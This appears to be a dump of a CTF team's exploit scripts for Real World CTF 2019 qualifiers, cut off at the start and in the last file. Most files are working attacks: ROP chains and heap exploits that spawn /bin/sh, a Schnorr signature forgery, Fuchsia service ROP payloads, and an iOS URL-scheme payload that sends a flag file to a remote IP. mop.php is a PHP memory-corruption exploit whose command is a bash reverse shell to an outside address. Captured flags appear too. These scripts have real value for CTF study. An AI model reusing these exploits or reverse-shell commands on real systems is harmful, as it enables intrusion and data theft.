 94 | payload += p64(enc_data) + p64(prev) + p64(io)
 95 | 
 96 | pop_rdi = text_base + 0x3c5a3
 97 | pop_rsi_rbp = text_base + 0x17737
 98 | pop_rdx_std_dec_rcx = text_base + 0x3199f
 99 | pop_rcx_mov_edi_dec_ecx = text_base + 0x110f3
100 | pop_rcx_cld_jmp_qword_rdx = text_base + 0x43541
101 | pop_rsp_rbp = text_base + 0x7b3f
102 | pop_rax = text_base + 0x47ab0
103 | malloc_got = text_base + 0x258E58
104 | aio_write = text_base + 0x7680
105 | aio_read = text_base + 0x75F0
106 | memcpy = text_base + 0x72D0
107 | ptrdiff = 0x47c30 # malloc - system
108 | sub = text_base + 0x287ff # sub    DWORD PTR [rcx-0x1],esi; call   QWORD PTR [rax+0x4855c3c9]
109 | 
110 | payload[8:0x10] = p64(pop_rax)
111 | payload[0x10:0x18] = p64(pop_rax + 1)
112 | cmd = '/bin/sh\x00'
113 | payload[0x20:len(cmd) + 0x20] = cmd
114 | ropchain = ''.join(map(p64, [
115 |     pop_rdx_std_dec_rcx, 0x8,
116 |     pop_rsi_rbp, malloc_got, 0x1234,
117 |     pop_rdi, rop2,
118 |     memcpy,
119 |     pop_rdx_std_dec_rcx, enc_data + 0x10,
120 |     pop_rcx_cld_jmp_qword_rdx, rop2 + 1,
121 |     pop_rsi_rbp, ptrdiff, 0x4321,
122 |     pop_rax, (enc_data + 8) - 0x4855c3c9,
123 |     sub,
124 |     pop_rdi, enc_data + 0x20,
125 |     pop_rsp_rbp, rop2 - 8,
126 |     ]))
127 | 
128 | payload[0x200:0x200+len(ropchain)] = ropchain
129 | 
130 | conn[1].send(str(payload))
131 | 
132 | r.interactive()
133 | 


--------------------------------------------------------------------------------
/rwctf19-quals/bank.py:
--------------------------------------------------------------------------------
 1 | from schnorr import *
 2 | from pwn import *
 3 | import hashlib
 4 | 
 5 | # rwctf{P1Ain_SChNorr_n33Ds_m0re_5ecur1ty!}
 6 | 
 7 | def prove(prefix):
 8 |     for i in xrange(0x10000):
 9 |         proof = prefix + '%05x' % i
10 |         test = hashlib.sha1(proof).digest()
11 |         if test[-1] == '\0' and test[-2] == '\0':
12 |             return proof
13 | 
14 | r = remote('tcp.realworldctf.com', 20014)
15 | 
16 | prefix = r.recvline().strip().split()[-1]
17 | print prefix
18 | proof = prove(prefix)
19 | print proof
20 | r.send(proof)
21 | 
22 | r.recvuntil('Please tell us your public key:')
23 | r.sendline(('%d, %d' % G).encode('base64').replace('\n', ''))
24 | r.sendline('3'.encode('base64').replace('\n', ''))
25 | r.recvuntil('one of us: (')
26 | x = int(r.recvuntil('L,', drop=True))
27 | y = int(r.recvuntil('L)', drop=True))
28 | pk = (x, y)
29 | print pk
30 | 
31 | r.recvuntil('Please tell us your public key:')
32 | r.sendline(('%d, %d' % G).encode('base64').replace('\n', ''))
33 | r.sendline('1'.encode('base64').replace('\n', ''))
34 | sig = schnorr_sign('DEPOSIT', 1)
35 | assert schnorr_verify('DEPOSIT', G, sig)
36 | r.sendline(sig.encode('base64').replace('\n', ''))
37 | 
38 | r.recvuntil('Please tell us your public key:')
39 | r.sendline(('%d, %d' % G).encode('base64').replace('\n', ''))
40 | r.sendline('1'.encode('base64').replace('\n', ''))
41 | sig = schnorr_sign('DEPOSIT', 1)
42 | assert schnorr_verify('DEPOSIT', G, sig)
43 | r.sendline(sig.encode('base64').replace('\n', ''))
44 | 
45 | _G = G[0], -G[1]
46 | t = point_add(pk, _G)
47 | t = t[0], -t[1]
48 | assert point_add(pk, t) == G
49 | print on_curve(t)
50 | 
51 | r.recvuntil('Please tell us your public key:')
52 | r.sendline(('%d, %d' % t).encode('base64').replace('\n', ''))
53 | r.sendline('2'.encode('base64').replace('\n', ''))
54 | sig = schnorr_sign('WITHDRAW', 1)
55 | assert schnorr_verify('WITHDRAW', G, sig)
56 | r.sendline(sig.encode('base64').replace('\n', ''))
57 | 
58 | r.interactive()
59 | 


--------------------------------------------------------------------------------
/rwctf19-quals/caidanti1.c:
--------------------------------------------------------------------------------
 1 | #include <stdint.h>
 2 | 
 3 | // rwctf{Turns_out_this_is_harder_than_expected}
 4 | 
 5 | typedef uint64_t size_t;
 6 | 
 7 | typedef struct string {
 8 |     const char *ptr;
 9 |     uint64_t length;
10 |     uint64_t flags;
11 | } string;
12 | 
13 | void *memset(void *b, int c, size_t len);
14 | 
15 | const char *c_str(const string *str);
16 | 
17 | void _start() {
18 |     uintptr_t text_base = (uintptr_t)__builtin_return_address(0) - 0x7205;
19 |     int (*printf)(const char *, ...);
20 |     int (*exit)(int);
21 |     *(uintptr_t *)&printf = text_base + 0x10C40;
22 |     *(uintptr_t *)&exit = text_base + 0x10C00;
23 |     void *ctx = *(void **)(text_base + 0x12140);
24 |     printf("hello world %#llx\n", text_base);
25 | 
26 |     uint64_t sol[2] = {0x416564614d756f59, 0x6c6c61434c444946L};
27 | 
28 |     string magic = {
29 |         .ptr = (char *)&sol,
30 |         .length = 0x10,
31 |         .flags = 0x8000000000000000 | 0x20,
32 |     };
33 | 
34 |     int (*SecretStorageGetFlag1)(void *, const string *, void *);
35 |     *(uintptr_t *)&SecretStorageGetFlag1 = text_base + 0x7F00;
36 | 
37 |     string resp;
38 |     memset(&resp, 0, sizeof(resp));
39 | 
40 |     printf("secret: %s\n", c_str(&magic));
41 | 
42 |     int ret = SecretStorageGetFlag1(ctx, &magic, &resp);
43 | 
44 |     printf("request result = %d\n", ret);
45 |     printf("flag: %s\n", c_str(&resp));
46 | 
47 |     exit(0);
48 | }
49 | 
50 | void *memset(void *b, int c, size_t len) {
51 |     for (int i = 0; i < len; i++) {
52 |         ((uint8_t *)b)[i] = c;
53 |     }
54 |     return b;
55 | }
56 | 
57 | const char *c_str(const string *str) {
58 |     if (str->flags & 0x8000000000000000) {
59 |         return str->ptr;
60 |     } else {
61 |         return (const char *)str;
62 |     }
63 | }
64 | 


--------------------------------------------------------------------------------
/rwctf19-quals/caidanti1.py:
--------------------------------------------------------------------------------
 1 | M = (2 ** 64) - 1
 2 | 
 3 | def rol(x, n):
 4 |     return ((x << n) | (x >> (64 - n))) & M
 5 | 
 6 | def add(x, y):
 7 |     return (x + y) & M
 8 | 
 9 | def sub(x, y):
10 |     return (x - y) & M
11 | 
12 | def enc(x, y):
13 |     v7 = 0x70697A7A6174716C
14 |     v10 = 0x6C7174617A7A6970
15 |     v9, v8 = x, y
16 |     for i in xrange(32):
17 |         v8 = v7 ^ add(v9, rol(v8, 56))
18 |         v9 = v8 ^ rol(v9, 3)
19 |         v10 = i ^ add(v7, rol(v10, 56))
20 |         v7 = v10 ^ rol(v7, 3)
21 |     return v8, v9
22 | 
23 | def dec(x, y):
24 |     v7 = 0x70697A7A6174716C
25 |     v10 = 0x6C7174617A7A6970
26 |     k = []
27 |     for i in xrange(32):
28 |         k.append(v7)
29 |         v10 = i ^ add(v7, rol(v10, 56))
30 |         v7 = v10 ^ rol(v7, 3)
31 |     v8, v9 = x, y
32 |     for i in xrange(31, -1, -1):
33 |         v9 = rol(v8 ^ v9, 61)
34 |         v8 = rol(sub(k[i] ^ v8, v9), 8)
35 |     return v9, v8
36 | 
37 | assert enc(0, 0) == (0x39af29ba501f0b21, 0xf9e6bb25024bd95c)
38 | sol = dec(0xC96AAC2F35C3833F, 0x8F1FA1AD36C66F95)
39 | print map(hex, sol)
40 | print map(hex, enc(*sol))
41 | 


--------------------------------------------------------------------------------
/rwctf19-quals/caidanti2.c:
--------------------------------------------------------------------------------
  1 | #include <stdint.h>
  2 | 
  3 | // rwctf{No_wonder_there_is_zero_reference_to_fuchsia::mem::Range_in_their_codebase}
  4 | 
  5 | typedef uint64_t size_t;
  6 | 
  7 | typedef struct string {
  8 |     char *ptr;
  9 |     uint64_t length;
 10 |     uint64_t flags;
 11 | } string;
 12 | 
 13 | struct ctx;
 14 | 
 15 | struct SecretStorageVT {
 16 |     void *a, *b;
 17 |     int (*SecretStorageCreate)(struct ctx *, const string *, const string *, int *);
 18 |     int (*SecretStorageListKeys)(struct ctx *, void *);
 19 |     int (*SecretStorageGetContent)(struct ctx *, const string *, void *);
 20 |     int (*SecretStorageDelete)(struct ctx *, const int, int *);
 21 |     int (*SecretStorageReset)(struct ctx*);
 22 | };
 23 | 
 24 | struct ctx {
 25 |     struct SecretStorageVT *vt1;
 26 |     void *vt2;
 27 |     void *chan;
 28 | };
 29 | 
 30 | void *memset(void *b, int c, size_t len);
 31 | void *memcpy(void *dst, const void *src, size_t len);
 32 | 
 33 | const char *c_str(const string *str);
 34 | size_t length(const string *str);
 35 | void set_string(string *str, const char *o, size_t len);
 36 | 
 37 | void _start() {
 38 |     uintptr_t text_base = (uintptr_t)__builtin_return_address(0) - 0x7205;
 39 |     int (*printf)(const char *, ...);
 40 |     int (*exit)(int);
 41 |     void *(*malloc)(size_t);
 42 |     void *(*zx_vmar_root_self)();
 43 |     int (*zx_vmar_map)(void *, int, int, void *, uint64_t, uint64_t, uintptr_t *);
 44 |     *(uintptr_t *)&printf = text_base + 0x10C40;
 45 |     *(uintptr_t *)&exit = text_base + 0x10C00;
 46 |     *(uintptr_t *)&malloc = text_base + 0x10E10;
 47 |     *(uintptr_t *)&zx_vmar_root_self = text_base + 0x10CB0;
 48 |     *(uintptr_t *)&zx_vmar_map = text_base + 0x10CC0;
 49 |     struct ctx *ctx = *(struct ctx **)(text_base + 0x12140);
 50 |     printf("hello world %#llx\n", text_base);
 51 | 
 52 | #define STRING(v, l) { \
 53 |     .ptr = v, \
 54 |     .length = l, \
 55 |     .flags = 0x8000000000000000 + l + 0x10 \
 56 | }
 57 | 
 58 |     string key = STRING(malloc(0x10000), 0x10000);
 59 |     string value = STRING(malloc(0x10000), 0x10000);
 60 | 
 61 |     set_string(&key, "aaa", 3);
 62 |     set_string(&value, "bbb", 3);
 63 |     
 64 |     int ret = 0, id = -1;
 65 |     ret = ctx->vt1->SecretStorageCreate(ctx, &key, &value, &id);
 66 |     printf("create %d: %d\n", ret, id);
 67 |     void **handle = (void *)0;
 68 |     ret = ctx->vt1->SecretStorageGetContent(ctx, &key, &handle);
 69 |     printf("getcontent %d: %p\n", ret, handle);
 70 |     printf("val: %p\n", *handle);
 71 | 
 72 |     void *root = zx_vmar_root_self();
 73 |     printf("root = %p\n", root);
 74 |     uintptr_t addr = 0;
 75 |     printf("map = %d\n", zx_vmar_map(root, 3, 0, *handle, 0, 0x1000, &addr));
 76 | 
 77 |     uint64_t storage_vtable = *(uint64_t *)addr;
 78 |     uint64_t storage = *(uint64_t *)(addr + 0x50);
 79 |     uint64_t service_base = storage_vtable - 0x13060;
 80 |     printf("service text base = %#lx\n", service_base);
 81 |     printf("storage = %#lx\n", storage);
 82 | 
 83 |     // 0x6927 push rax; mov r14, rdi; mov rax, [rdi, 0x20]; add rdi, 0x30; call [rax + 0x20]
 84 |     // 0x55d4 push rax; jmp [rsi + 0x2e]
 85 |     // 0x5485 pop rsp; pop r13; pop r14; pop r15; ret;
 86 |     // 0x7bdb mov rsi, [rsp + 0x28]; mov rdx, [rsp + 0x30]; mov rcx, rbp; call [rax + 0x10]
 87 |     *(uint64_t *)(addr + 0x410) = service_base + 0x6927;
 88 |     *(uint64_t *)(addr + 0x20) = storage + 0x440;
 89 |     *(uint64_t *)(addr + 0x460) = service_base + 0x6927;
 90 |     *(uint64_t *)(addr + 0x50) = storage + 0x480;
 91 |     *(uint64_t *)(addr + 0x4a0) = service_base + 0x6927;
 92 |     *(uint64_t *)(addr + 0x80) = storage + 0x4c0;
 93 |     *(uint64_t *)(addr + 0x4e0) = service_base + 0x7bdb;
 94 |     *(uint64_t *)(addr + 0x4d0) = service_base + 0x55d4;
 95 |     *(uint64_t *)(addr + 0x42e) = service_base + 0x5485;
 96 |     *(uint64_t *)(addr + 0x4d8) = service_base + 0x548a; // pop r15; ret;
 97 | 
 98 |     // real rop
 99 |     *(uint64_t *)(addr + 0x4e8) = service_base + 0x5686; // pop rdi; ret;
100 |     *(uint64_t *)(addr + 0x4f0) = 3;
101 |     *(uint64_t *)(addr + 0x4f8) = service_base + 0x53cd; // pop rsi; ret;
102 |     *(uint64_t *)(addr + 0x500) = storage + 0x800;
103 |     *(uint64_t *)(addr + 0x508) = service_base + 0x1266a; // pop rcx; ret;
104 |     *(uint64_t *)(addr + 0x510) = storage + 0x600;
105 |     *(uint64_t *)(addr + 0x518) = service_base + 0x11a45; // pop rdx; mov [rcx], ...; ret;
106 |     *(uint64_t *)(addr + 0x520) = 0x800;
107 |     *(uint64_t *)(addr + 0x528) = service_base + 0x12900; // read
108 |     *(uint64_t *)(addr + 0x530) = 0x44444;
109 | 
110 |     *(uint64_t *)addr = storage + 0x400;
111 | 
112 |     ret = ctx->vt1->SecretStorageCreate(ctx, &key, &value, &id);
113 |     printf("delete %d: %d\n", ret, id);
114 |     printf("flag: %s\n", addr + 0x800);
115 | 
116 |     exit(0);
117 | }
118 | 
119 | void *memset(void *b, int c, size_t len) {
120 |     for (int i = 0; i < len; i++) {
121 |         ((uint8_t *)b)[i] = c;
122 |     }
123 |     return b;
124 | }
125 | 
126 | const char *c_str(const string *str) {
127 |     if (str->flags & 0x8000000000000000) {
128 |         return str->ptr;
129 |     } else {
130 |         return (const char *)str;
131 |     }
132 | }
133 | 
134 | size_t length(const string *str) {
135 |     if (str->flags & 0x8000000000000000) {
136 |         return str->length;
137 |     } else {
138 |         return (str->length >> 56) & 0xff;
139 |     }
140 | }
141 | 
142 | void set_string(string *str, const char *o, size_t len) {
143 |     memcpy(str->ptr, o, len);
144 |     str->length = len;
145 | }
146 | 
147 | void *memcpy(void *dst, const void *src, size_t len) {
148 |     for (int i = 0; i < len; i++) {
149 |         ((uint8_t *)dst)[i] = ((uint8_t *)src)[i];
150 |     }
151 |     return dst;
152 | }
153 | 


--------------------------------------------------------------------------------
/rwctf19-quals/dezhou_instrumentz.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | 
 3 | host = 'http://149.28.204.92'
 4 | flag = '/flag'
 5 | 
 6 | def Class(name):
 7 |     return 'CAST("%s", "Class")' % name
 8 | 
 9 | def Call(obj, func, *args):
10 |     ext = ', ' + ', '.join(map(str, args)) if len(args) > 0 else ''
11 |     return 'FUNCTION(%s, %s%s)' % (obj, func, ext)
12 | 
13 | mainBundle = Call(Call(Class("NSBundle"), '"mainBundle"'), '"bundlePath"')
14 | print mainBundle
15 | 
16 | flagPath = Call(Class("NSString"), '"pathWithComponents:"', '{%s, "%s"}' %
17 |         (mainBundle, flag))
18 | print flagPath
19 | 
20 | flag = Call(Class("NSData"), '"dataWithContentsOfFile:"', flagPath)
21 | print flag
22 | 
23 | url = Call(Class("NSString"), '"pathWithComponents:"', '{"%s", %s}' %
24 |         (host, Call(flag, '"base64EncodedStringWithOptions:"', 0)))
25 | print url
26 | 
27 | url = Call(Class("NSURL"), '"URLWithString:"', url)
28 | print url
29 | 
30 | req = Call(Class("NSURLRequest"), '"requestWithURL:"', url)
31 | print req
32 | 
33 | conn = Call(Class("NSURLConnection"), '"connectionWithRequest:delegate:"', req,
34 |         Class("NSURLConnection"))
35 | print conn
36 | 
37 | print 'icalc://' + urllib.quote(conn.replace(' ', '')).replace('/', '%2f')
38 | 
39 | # rwctf{alldayidreamaboutprejailbrokeniphone}\n
40 | 


--------------------------------------------------------------------------------
/rwctf19-quals/fax_sender.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import threading
 3 | 
 4 | # rwctf{Digging_Into_libxdr}
 5 | 
 6 | context.terminal = ['tmux', 'split', '-h']
 7 | context.endian = 'big'
 8 | context.arch = 'amd64'
 9 | 
10 | result = []
11 | def listener():
12 |     l = listen(10917)
13 |     l.wait_for_connection()
14 |     result.append(l.recvall())
15 | 
16 | th = threading.Thread(target=listener)
17 | th.start()
18 | 
19 | r = remote('tcp.realworldctf.com', 10917)
20 | def recvline():
21 |     d = r.recvn(0x1000)
22 |     l = u32(d[:4])
23 |     return d[4:4+l]
24 | 
25 | r.send(p32(1) + p32(1) + p32(4) + 'a' * 4 + p32(14) + '149.28.204.92\x00')
26 | print recvline()
27 | r.send(p32(4) + p32(0) + p32(4) + 'b' * 4)
28 | print recvline()
29 | r.send(p32(4) + p32(0) + p32(4) + 'c' * 4)
30 | print recvline()
31 | 
32 | r.send(p32(6) + p32(0))
33 | print recvline()
34 | r.send(p32(6) + p32(1))
35 | print recvline()
36 | 
37 | r.send(p32(4) + p32(0) + p32(0x2000) + 'B' * 4)
38 | print recvline()
39 | 
40 | r.send(p32(7) + p32(0))
41 | print recvline()
42 | th.join()
43 | 
44 | print hexdump(result[0])
45 | heap_ptr = u64(result[0][0x20:0x28], endian='little')
46 | heap_base = heap_ptr & ~0xfff
47 | print 'heap base = %#x' % (heap_base)
48 | 
49 | free_hook = 0x6BEE98
50 | r.send(p32(4) + p32(0) + p32(0x10) + p64(free_hook, endian='little') + 'd' * 8)
51 | print recvline()
52 | r.send(p32(4) + p32(0) + p32(0x10) + 'e' * 0x10)
53 | print recvline()
54 | r.send(p32(4) + p32(0) + p32(0x10) + 'f' * 0x10)
55 | print recvline()
56 | 
57 | ldr_rax_rdi_8_call_rax_10 = 0x44d088
58 | xchg = 0x4a9679
59 | rop_addr = heap_ptr + 0x40
60 | pop_rdi = 0x492157
61 | pop_rsi = 0x490773
62 | pop_rsi = 0x490773
63 | pop_rdx = 0x4b184a
64 | pop_rax = 0x477e07
65 | pop_r12_r13_r14_r15 = 0x40067f
66 | syscall = 0x4773C5
67 | rop = ''.join(map(lambda _: p64(_, endian='little'), [
68 |     pop_r12_r13_r14_r15 + 1, rop_addr, xchg,
69 |     pop_rax, 10,
70 |     pop_rdi, heap_base,
71 |     pop_rsi, 0x4000,
72 |     pop_rdx, 7,
73 |     syscall,
74 |     rop_addr + 0x100,
75 |     0x41414141
76 |     ])).ljust(0x100)
77 | rop += asm(shellcraft.sh())
78 | rop = rop.ljust(0x800)
79 | r.send(p32(4) + p32(0) + p32(len(rop)) + rop)
80 | print recvline()
81 | 
82 | r.send(p32(4) + p32(0) + p32(0x10) + p64(ldr_rax_rdi_8_call_rax_10, endian='little') + 'g' * 8)
83 | print recvline()
84 | 
85 | r.send(p32(6) + p32(3))
86 | 
87 | r.interactive()
88 | 


--------------------------------------------------------------------------------
/rwctf19-quals/mop.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | file_put_contents("/tmp/cmb", "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");
 4 | 
 5 | $ss = array(0, 1);
 6 | $b = 'bbbbbbbbbbbbbbb';
 7 | $cmd = 'bash -c "bash -i >& /dev/tcp/149.28.204.92/4444 0>&1"';
 8 | $m = $cmd . str_repeat("\x00", 0x97 - strlen($cmd));
 9 | 
10 | var_dump(mkdir("/tmp/cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc/")); // 0x50
11 | 
12 | $za = new ZipArchive;
13 | $zb = new ZipArchive;
14 | $zc = new ZipArchive;
15 | $zc->open('/tmp/ha.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);
16 | // $zipname = '/tmp/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'; // 0x80
17 | $zipname = '/tmp/cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc/ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd'; // 0x107
18 | $zb->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE);
19 | $zb->addFromString('a','b');
20 | 
21 | $zipname = '/tmp/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'; // 0x37
22 | $za->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE);
23 | $za->addFromString('a','b');
24 | $za->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
25 | $s = $b . $b;
26 | $za->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
27 | $zb->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
28 | $a = array_unique ($ss, SORT_REGULAR);
29 | $zval_ptr_dtor = unpack('P', substr($s, 0x18, 8))[1];
30 | echo(printf("zval_ptr_dtor = %x\n", $zval_ptr_dtor));
31 | $bucket_addr = strlen($s);
32 | echo(printf("bucket_addr = %x\n", $bucket_addr));
33 | 
34 | $zif_shell_exec = $zval_ptr_dtor - 0x395e30 + 0x2C8150; // zif_shell_exec
35 | 
36 | $zb->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
37 | $u = 'eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee' . pack('IIQQQQQQ', 0, 1, 0, 0, 0, 0, $bucket_addr + 0x80 - 0x18, 6) . $m;
38 | 
39 | $za->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
40 | print('here');
41 | $zc->addFromString('b', substr(pack('IIQQQQQQ', 1, 0x7, 0x4, $bucket_addr + 0x48 - 0x28, 1, 0, 0, $zif_shell_exec), 0, 0x37));
42 | unset($a);
43 | $za->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
44 | 


--------------------------------------------------------------------------------
/rwctf19-quals/mop/Master_of_PHP.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5lipper/ctf/3112383ad3b0e0941e8e0400dc27f431370bd709/rwctf19-quals/mop/Master_of_PHP.zip


--------------------------------------------------------------------------------
/rwctf19-quals/mop/mop.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <unistd.h>
 3 | #include <sys/types.h>
 4 | #include <sys/fcntl.h>
 5 | #include <sys/time.h>
 6 | #include <sys/resource.h>
 7 | 
 8 | int main(int argc, char **argv) {
 9 | 	char buf[0x100];
10 | 	int rp[2], wp[2];
11 | 	pipe(&rp);
12 | 	pipe(&wp);
13 | 	int pid = fork();
14 | 	if (!pid) {
15 | 		dup2(wp[1], 1);
16 | 		dup2(rp[0], 0);
17 | 		close(wp[0]);
18 | 		close(rp[1]);
19 | 		execl("/readflag", "readflag", NULL);
20 | 	} else {
